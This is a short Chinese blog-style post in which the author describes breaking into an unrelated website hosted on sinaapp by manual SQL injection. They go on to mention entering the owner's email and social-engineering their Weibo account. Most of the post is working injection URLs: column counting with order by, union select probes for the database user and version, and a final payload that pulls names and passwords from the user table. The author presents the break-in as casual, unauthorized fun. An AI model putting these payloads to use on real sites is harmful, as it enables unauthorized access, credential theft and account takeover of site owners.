手头的事做完了,看到朋友空间转个骗人抽奖的网站,不知道怎么的就跳转到sinaapp网站下了然后旁注到这个站,记录一下很少能遇见手工的注入的站了。
http://xxx.sinaapp.com/species_show.php?id=1%20order%20by%2018
经过order by的测试为18个字段。
http://xxx.sinaapp.com/species_show.php?id=1%20order%20by%2019
输入19的时候就会报错,接着就看看支不支持联合查询了。
(告诉大家一个小技巧,如果union后没有返回数据就把前面的参数id改成9999让原本的数据没办法返回就会返回我们输入的值了)
http://xxx.sinaapp.com/species_show.php?id=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
http://xxx.sinaapp.com/species_show.php?id=9999%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
SAE肯定不是root了
http://xxx.sinaapp.com/species_show.php?id=9999%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
数据库版本:
直接出账号密码吧。
http://xxx.sinaapp.com/species_show.php?id=9999%20and%201=2%20union%20select%201,concat(name),concat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20user%20limit%200,1--
接着就是找到联系方式进邮箱
社进微博
就到这里,后期如果有继续深入会继续写随笔,跟大家分享。